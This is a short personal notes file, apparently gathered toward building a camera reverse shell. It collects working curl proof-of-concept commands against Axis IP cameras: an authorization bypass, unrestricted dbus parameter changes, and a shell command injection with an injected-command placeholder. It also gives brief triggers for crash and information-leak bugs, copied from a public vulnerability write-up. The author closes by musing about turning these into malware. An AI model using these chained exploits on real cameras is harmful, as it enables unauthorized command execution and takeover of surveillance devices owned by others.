Camera Reverse Shell notes.txt

----CVE-2018-10661 – Authorization bypass vulnerability
Below is a POC that shows this bypass

_SERVER="<camera-ip>"
curl -i "http://${_SERVER}/index.html/a.srv" --data "action=abc&return_page=it_worked"


-----CVE-2018-10662 – Unrestricted dbus access for users of the .srv functionality:
Below is a POC of this that enables the axis watermark overlay

_SERVER="<camera-ip>"
_PARAM_NAME="root.Image.I0.Overlay.enabled"
_PARAM_VALUE="yes"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.setParameter string:$_PARAM_NAME string:$_PARAM_VALUE"
curl "http://${_SERVER}/index.html/a.srv" --data "action=dbus&args=--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"


----CVE-2018-10660 – Shell command injection vulnerability:
Below is a POC

_SERVER="<camera-ip>"
ROOT_USER="<username>"
ROOT_PWD="<password>"
_INJECTED_COMMAND=";<insert-cmd>;"
curl --digest --user ${ROOT_USER}:${ROOT_PWD} "http://${_SERVER}/axis-cgi/param.cgi?action=update&Time.DST.Enabled=${_INJECTED_COMMAND}"








Unreleated vulnerabilities:
CVE-2018-10664 – Crashing the httpd process:
This vulnerability is triggered by issuing an HTTP request to a .cgi script URL, with a PATH_INFO that ends with the .srv extension.

CVE-2018-10663 Information Leakage vulnerability in the /bin/ssid process:
do 10661, action=get_htmlform&return_page=<long input, 228/300 "a"s>

CVE-2018-10658 Crashing the /bin/ssid process
do 10661, action=dbus&arg=--system --dest=com.b /com/a com.a

CVE-2018-10659 Crashing of the /bin/ssid process.
do 10661, action=get

from: https://web.archive.org/web/20180628070550/https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/

this might be a fun thing to test making a "malware"